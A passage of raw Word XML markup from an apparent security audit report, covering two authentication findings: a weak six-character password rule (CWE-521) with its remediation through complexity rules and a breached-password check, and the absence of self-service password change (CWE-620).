xzUEsBAi0AFAAGAAgAAAAhAOj1V0uXBAAAwhAAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhAEByv9/hAAAACQEAAA8AAAAAAAAAAAAAAAAA8QYAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAD/BwAAAAA=&#10;">
                <v:shape id="Shape 1290" o:spid="_x0000_s1027" style="position:absolute;width:14001;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1400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E2xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwMx&#10;EIXvQv9DmIIXsVmXIro2LVUQhYLQqtDjdDPuhm4myyZ203/fOQjeZnhv3vtmscq+Uycaogts4G5W&#10;gCKug3XcGPj6fL19ABUTssUuMBk4U4TVcnK1wMqGkbd02qVGSQjHCg20KfWV1rFuyWOchZ5YtJ8w&#10;eEyyDo22A44S7jtdFsW99uhYGlrs6aWl+rj79QaOh7dynUf3PM/uhuwmfn/wvjPmeprXT6AS5fRv&#10;/rt+t4JfPgq/fCMj6OUFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAR1fRNsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l1390650,v2630,,4875,930,6735,2784c1399245,4645,1400174,6896,1400175,9525r,114300c1400174,126454,1399245,128693,1397385,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1400175,133350"/>
                </v:shape>
                <v:shape id="Shape 1298" o:spid="_x0000_s1028" style="position:absolute;left:9620;top:4286;width:9334;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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pFQyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PS8NA&#10;EMXvgt9hGcGLtJv2ICZ2W0qhKijYPyJ4G7JjNpidTbJrEr+9cxC8zfDevPeb1WbyjRqoj3VgA4t5&#10;Boq4DLbmysDbeT+7AxUTssUmMBn4oQib9eXFCgsbRj7ScEqVkhCOBRpwKbWF1rF05DHOQ0ss2mfo&#10;PSZZ+0rbHkcJ941eZtmt9lizNDhsaeeo/Dp9ewMP20PO789uvHl9HF7OedftPrgz5vpq2t6DSjSl&#10;f/Pf9ZMV/GUuuPKNjKDXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBr2pFQyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m9525,l923925,v2630,,4875,930,6735,2784c932520,4645,933450,6896,933450,9525r,123825c933450,135979,932520,138218,930660,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-05c</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">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Weak password policy.</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'required|string|min:6</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Confirmed: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"123456" was accepted</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most commonly used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> password in the world. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-521.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B358B5C" w14:textId="65A762A6" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fixed:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 characters, mixed case, digit, symbol, plus </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uncompromised(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">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a Have I Been </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> check using k-anonymity, so only the first five characters of the SHA-1 hash leave the server and the password never does. If that service is unreachable the rule passes rather than locking staff out of account creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60302F86" w14:textId="237D050E"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6352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45C87A32" wp14:editId="37049BC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4266307</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="409575" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26565" name="Group 26565"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="409575" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="409575" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1305" name="Shape 1305"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="409575" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402680" y="0"/>
                                  <a:pt x="404925" y="930"/>
                                  <a:pt x="406785" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408645" y="4638"/>
                                  <a:pt x="409575" y="6890"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="135979"/>
                                  <a:pt x="408645" y="138224"/>
                                  <a:pt x="406785" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404925" y="141932"/>
                                  <a:pt x="402680" y="142863"/>
                                  <a:pt x="400050" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>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9E92C62" id="Group 26565" o:spid="_x0000_s1026" style="position:absolute;margin-left:335.95pt;margin-top:-1.45pt;width:32.25pt;height:11.25pt;z-index:-251440128" coordsize="40957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ZuTwMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1oty0bsAG2WS9EG&#10;TfoBNE1ZAihRIOmtX9/hSKQl2wiQJAeHIufNvHkzXG7vDjX3dkyqSjQLP7oJfY81VKyrZrPw/74+&#10;fst9T2nSrAkXDVv4R6b8u+XXL7f7ds5iUQq+ZtIDJ42a79uFX2rdzoNA0ZLVRN2IljWwWAhZEw2f&#10;chOsJdmD95oHcRhmwV7IdSsFZUrB7H236C/Rf1Ewqn8XhWLa4wsfuGn8lfi7Mr/B8pbMN5K0ZUV7&#10;GuQDLGpSNRDUubonmnhbWV24qisqhRKFvqGiDkRRVJRhDpBNFJ5l8yTFtsVcNvP9pnUygbRnOn3Y&#10;Lf21e5LtS/ssQYl9uwEt8Mvkcihkbf4DS++Akh2dZOygPQqTaTibTCe+R2EpSuMcxigpLUH3CxQt&#10;H97EBTZoMKKyb6E51Cl/9bn8X0rSMpRVzSH/Z+lVa2CfhJBHQ2roUrTwcAZlQTsnkpor0OtzCrlM&#10;yZxulX5iAqUmu59Kdz25tiNS2hE9NHYoobPf7OmWaIMzLM3Q259qVbpSmdVa7NirQDttCjabxKCD&#10;rTTwPBnwZmiYhmE4gT01MLUGdLuq6Hf2b2weZ/nAHHhhvDRMZ33EWdJvSLuSTfOOSzyd5qaxgM7Y&#10;9/jL4vIs7XBpliDuFKxrV+Cc5bOzaG4JJbgWzeZn4zhElCQJaNFhrNV1bgPMZDadddvFOnTEoySP&#10;43S86NSIQPpp/A49nMJRGs0SRJ4UcWUx+zdLxjFdiU+b+6IGNt8uCdc/I4S1uaYJVKKr1hUCWd9h&#10;l8TjKdTPNN871TBNhrALhe38eVns/KDE4zRscp0Anfmgh+zyGDQ0Pu9Fy/G8fV3O79sPVsSz/eV0&#10;H+0DVz/bzmPalAvFuj435wpuSXfWYGucTjPemGMH9KAErvaCE413ZF1puPN5VUPt4imcIn0n8wa8&#10;mbO+O15xpI+cmbOJN39YAec03kNmQsnN6geX3o6Ymx3/0DnhbUn62d5vb4pU0Y/BFxXnzmWE0JHL&#10;h/vH+DHrPfTGBsfwUeGQYYekPZvuZQH3MyRt3xcgigNhZNFoh2/gVYRBBtma4Uqsj3gnoyBw+aE0&#10;+AzAPPoni3lnDL/R6vSwWv4HAAD//wMAUEsDBBQABgAIAAAAIQDjNigp4AAAAAkBAAAPAAAAZHJz&#10;L2Rvd25yZXYueG1sTI/BasJAEIbvhb7DMoXedBNto6bZiEjbkxSqBeltzI5JMLsbsmsS377TU3sa&#10;hvn45/uz9Wga0VPna2cVxNMIBNnC6dqWCr4Ob5MlCB/QamycJQU38rDO7+8yTLUb7Cf1+1AKDrE+&#10;RQVVCG0qpS8qMuinriXLt7PrDAZeu1LqDgcON42cRVEiDdaWP1TY0rai4rK/GgXvAw6befza7y7n&#10;7e378Pxx3MWk1OPDuHkBEWgMfzD86rM65Ox0clervWgUJIt4xaiCyYwnA4t58gTixOQqAZln8n+D&#10;/AcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCEmhZuTwMAAKAJAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDjNigp4AAAAAkBAAAPAAAAAAAAAAAA&#10;AAAAAKkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAtgYAAAAA&#10;">
                <v:shape id="Shape 1305" o:spid="_x0000_s1027" style="position:absolute;width:409575;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4095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rMwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL0E3W1KRVLXoIFAT4WoB49DdkxCs7MhuzXx33cLhd7m8T5nl8+2F3cafedYw8tagSCu&#10;nem40XA5l6stCB+QDfaOScODPOT7xdMOM+Mmruh+Co2IIewz1NCGMGRS+roli37tBuLI3dxoMUQ4&#10;NtKMOMVw28tUqY202HFsaHGgoqX66/RtNXwOQaVJelMTb4preazwUSao9fNyPryDCDSHf/Gf+8PE&#10;+a/qDX6/iSfI/Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAI3KqzMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l400050,v2630,,4875,930,6735,2778c408645,4638,409575,6890,409575,9525r,123825c409575,135979,408645,138224,406785,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138224,,135979,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,409575,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-05d</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No self-service password change.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The only path was the admin-only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">update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which did </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> require the current password. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> any compromise of an admin token was a permanent takeover of every account, and a cashier who thought their password had been seen could do nothing. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-620.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BFF1F" w14:textId="45C238BD" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="86"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001244A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46D8929B" wp14:editId="7D7D2D6E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370582</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19458</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26566" name="Group 26566"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1285875" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1285875" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1314" name="Shape 1314"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1285875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1285875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1278980" y="0"/>
                                  <a:pt x="1281225" y="930"/>
                                  <a:pt x="1283085" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1284945" y="4638"/>
                                  <a:pt x="1285875" y="6890"/>
                                  <a:pt x="1285875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1285875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1285875" y="126454"/>
                                  <a:pt x="1284945" y="128699"/>
                                  <a:pt x="1283085" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1281225" y="132407"/>
                                  <a:pt x="1278980" y="133338"/>
                                  <a:pt x="1276350" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>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2C7310B" id="Group 26566" o:spid="_x0000_s1026" style="position:absolute;margin-left:29.2pt;margin-top:-1.55pt;width:101.25pt;height:10.5pt;z-index:-251439104" coordsize="12858,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PaxTgMAALIJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9q8yELsAG2WS9EG&#10;TfoBNE1ZAihRIOmtX9/hSKQlOQ2axAeZy7xZ3gyHvL45VtzbM6lKUS/96Cr0PVZTsSnr7dL//Xz/&#10;JfU9pUm9IVzUbOmfmPJvVp8/XR+ajMWiEHzDpAdKapUdmqVfaN1kQaBowSqirkTDatjMhayIhqnc&#10;BhtJDqC94kEchrPgIOSmkYIypWD1tt30V6g/zxnVP/NcMe3xpQ++afxK/K7NN1hdk2wrSVOUtHOD&#10;vMOLipQ1GHWqbokm3k6WF6qqkkqhRK6vqKgCkeclZRgDRBOFo2gepNg1GMs2O2wbRxNQO+Lp3Wrp&#10;j/2DbJ6aRwlMHJotcIEzE8sxl5X5By+9I1J2cpSxo/YoLEZxOk3nU9+jsBclSTLtOKUFEH8Bo8Xd&#10;68DAmg0GzhwaKA91ZkB9jIGngjQMiVUZMPAovXJj3I8mvleTCuoUJTxcQWJQztGkMgWMfZAjFyrJ&#10;6E7pByaQbbL/rnRblhs7IoUd0WNthxKK+9Wybog2OOOmGXqHXroKly2zXYk9exYoqE3OFtMYUmqz&#10;DY6eBXjdF4zi+cykvC9rJehuXdKv7M9IPl2kPXlwDS1CHUVxZ3SRdDXktpIwbf2J5/PUnFlwaah+&#10;OHPAyWLSAiezBIE9e23dQpCzdDE26PaQiZcM2iidKQeJ4iSFSFqQFfuHfz3QbDKdtO3IqXTeAzuz&#10;xWK060iJknA6xd3/pcVRHSXxJJwPFc9dhsx5HtN2zvf5tF+YtVG3kbhqGiCszEvMQEbatF16MJl1&#10;5XbpejyHPJpKfCMhpt4QdsGyXR/nxq73Ej0MwwbXEtCK90rJbg9BfeFxTVofx3XsYn7TyXAkjo6a&#10;431wHlz+cPUi2ZQLxdpqN20GD6drPSh9bm68Nl0I+KAELvucE423ZlVqeAXwsjIdah6G1hCvQZvp&#10;/W27xZE+cWY6Fa9/sRz6Nt5MZkHJ7fobl96emLsef6ic8KYg3Wp3KjtRdBX1GHxecu5URggdqLy7&#10;vY/vZ52GTtjgGD4zHDJskbTzpn1rwI0NQdsXB5DiQGhZ1Nrha3gnoZFetGa4FpsT3tJICFyGSA0+&#10;DDCO7hFjXh79OUqdn1qrvwAAAP//AwBQSwMEFAAGAAgAAAAhANLFSxTfAAAACAEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj0FrwkAQhe+F/odlCr3pJlqtptmISNuTCNWCeFuzYxLMzobsmsR/3+mpPQ7v&#10;471v0tVga9Fh6ytHCuJxBAIpd6aiQsH34WO0AOGDJqNrR6jgjh5W2eNDqhPjevrCbh8KwSXkE62g&#10;DKFJpPR5iVb7sWuQOLu41urAZ1tI0+qey20tJ1E0l1ZXxAulbnBTYn7d36yCz17362n83m2vl839&#10;dJjtjtsYlXp+GtZvIAIO4Q+GX31Wh4ydzu5GxotawWzxwqSC0TQGwflkHi1BnBl8XYLMUvn/gewH&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAd/D2sU4DAACyCQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA0sVLFN8AAAAIAQAADwAAAAAAAAAAAAAA&#10;AACoBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAALQGAAAAAA==&#10;">
